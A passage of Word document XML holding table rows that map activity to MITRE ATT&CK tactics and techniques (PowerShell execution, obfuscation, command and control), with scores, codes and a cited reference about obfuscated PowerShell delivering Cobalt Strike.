              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09418527" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="319DF1C6" w14:textId="38FE9E66" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="00E357F6" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DCA552B" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D665003" w14:textId="1D93B883" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13511325" w14:textId="628159C2" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="0091136F" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28584098" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00FF1E4B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="0064459B" w14:paraId="47C107B1" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B5EE0A2" w14:textId="5851EAA9" w:rsidR="007B4DCC" w:rsidRPr="0064459B" w:rsidRDefault="00E357F6" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01DCA21D" w14:textId="2AB1AF87" w:rsidR="007B4DCC" w:rsidRPr="0064459B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0843DE5F" w14:textId="76109AD6" w:rsidR="007B4DCC" w:rsidRPr="0064459B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EB69FF5" w14:textId="3F9E985F" w:rsidR="007B4DCC" w:rsidRPr="0064459B" w:rsidRDefault="00E357F6" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72812A87" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="0064459B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74CEA80B" w14:textId="6C5AB420" w:rsidR="007B4DCC" w:rsidRPr="0064459B" w:rsidRDefault="000C6969" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F234260" w14:textId="0FF47E4A" w:rsidR="007B4DCC" w:rsidRPr="0064459B" w:rsidRDefault="0091136F" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76B6394C" w14:textId="64432D93" w:rsidR="007B4DCC" w:rsidRPr="00FF1E4B" w:rsidRDefault="00E35C52" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidR="007B4DCC" w:rsidRPr="00FF1E4B">
              <w:t>Obfuscated PowerShell delivering Cobalt Strike Beacon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E46DD" w:rsidRPr="003470D7" w14:paraId="20CA5124" w14:textId="77777777" w:rsidTr="006E0AE9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11A47CB8" w14:textId="3C48968A" w:rsidR="006E46DD" w:rsidRPr="003470D7" w:rsidRDefault="006E46DD" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E5166D9" w14:textId="77777777" w:rsidR="006E46DD" w:rsidRPr="003470D7" w:rsidRDefault="006E46DD" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43E38207" w14:textId="77777777" w:rsidR="006E46DD" w:rsidRPr="003470D7" w:rsidRDefault="006E46DD" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A000F4D" w14:textId="3E3989D6" w:rsidR="006E46DD" w:rsidRPr="003470D7" w:rsidRDefault="00B25EEB" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F57BEC3" w14:textId="77777777" w:rsidR="006E46DD" w:rsidRPr="003470D7" w:rsidRDefault="006E46DD" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="243E04C0" w14:textId="77777777" w:rsidR="006E46DD" w:rsidRPr="003470D7" w:rsidRDefault="006E46DD" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A48FF48" w14:textId="4010DF0D" w:rsidR="006E46DD" w:rsidRPr="003470D7" w:rsidRDefault="0091136F" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D765C93" w14:textId="77777777" w:rsidR="006E46DD" w:rsidRPr="00FF1E4B" w:rsidRDefault="006E46DD" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004151E8" w:rsidRPr="0064459B" w14:paraId="797293F1" w14:textId="77777777" w:rsidTr="006E0AE9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DE6FB75" w14:textId="63A39F1B" w:rsidR="004151E8" w:rsidRPr="0064459B" w:rsidRDefault="004151E8" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01499C70" w14:textId="77777777" w:rsidR="004151E8" w:rsidRPr="0064459B" w:rsidRDefault="004151E8" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00031B81" w14:textId="77777777" w:rsidR="004151E8" w:rsidRPr="0064459B" w:rsidRDefault="004151E8" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0064459B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1242DACA" w14:textId="32933C58" w:rsidR="004151E8" w:rsidRPr="0064459B" w:rsidRDefault="004420CA" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29D03BD4" w14:textId="77777777" w:rsidR="004151E8" w:rsidRPr="0064459B" w:rsidRDefault="004151E8" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="349409A4" w14:textId="77777777" w:rsidR="004151E8" w:rsidRPr="0064459B" w:rsidRDefault="004151E8" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E42AB86" w14:textId="01863593" w:rsidR="004151E8" w:rsidRPr="0064459B" w:rsidRDefault="0091136F" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EBB1071" w14:textId="77777777" w:rsidR="004151E8" w:rsidRPr="00FF1E4B" w:rsidRDefault="004151E8" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidRPr="00FF1E4B">
              <w:t>Obfuscated PowerShell delivering Cobalt Strike Beacon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w14:paraId="0C4C985A" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23CCA88D" w14:textId="1B6F567D" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004151E8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D6AFC64" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00DB171B"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0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C6179FF" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
